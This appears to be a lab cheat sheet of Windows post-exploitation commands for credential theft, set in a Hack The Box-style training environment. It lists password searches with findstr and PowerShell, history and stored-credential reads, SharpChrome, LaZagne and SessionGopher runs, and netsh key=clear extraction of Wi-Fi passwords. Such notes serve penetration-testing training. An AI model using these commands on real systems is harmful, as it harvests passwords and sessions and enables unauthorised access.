Credential Theft

Searching for Passwords in Files

1. Search for files containing the phrase "password"

   findstr /SIM /C:"password" *.txt *ini *.cfg *.config *.xml

2. Search for passwords in Chrome dictionary files

   gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

3. Confirm PowerShell history save path

   (Get-PSReadLineOption).HistorySavePath

4. Read PowerShell history file

   gc (Get-PSReadLineOption).HistorySavePath

5. Decrypt stored PowerShell credentials

   $credential = Import-Clixml -Path 'C:\scripts\pass.xml'

6. Search file contents for "password"

   cd c:\Users\htb-student\Documents & findstr /SI /M "password" *.xml *.ini *.txt

7. Search file contents for "password" recursively

   findstr /si password *.xml *.ini *.txt *.config

8. Search for specific strings in all files

   findstr /spin "password" *.*

9. Search file contents with PowerShell

   select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password

10. Search for files with specific extensions

    dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

11. Search for configuration files recursively

    where /R C:\ *.config

12. Search for credential-related files using PowerShell

    Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Credential Dumping & Enumeration

1. List saved credentials on Windows

   cmdkey /list

2. Retrieve saved Chrome credentials using SharpChrome

   .\SharpChrome.exe logins /unprotect

3. View LaZagne help menu

   .\lazagne.exe -h

4. Run all LaZagne modules

   .\lazagne.exe all

5. Run SessionGopher to extract session information

   Invoke-SessionGopher -Target WINLPE-SRV01

Wireless Network Credential Extraction

1. View saved wireless networks

   netsh wlan show profile

2. Retrieve saved wireless passwords

   netsh wlan show profile ilfreight_corp key=clear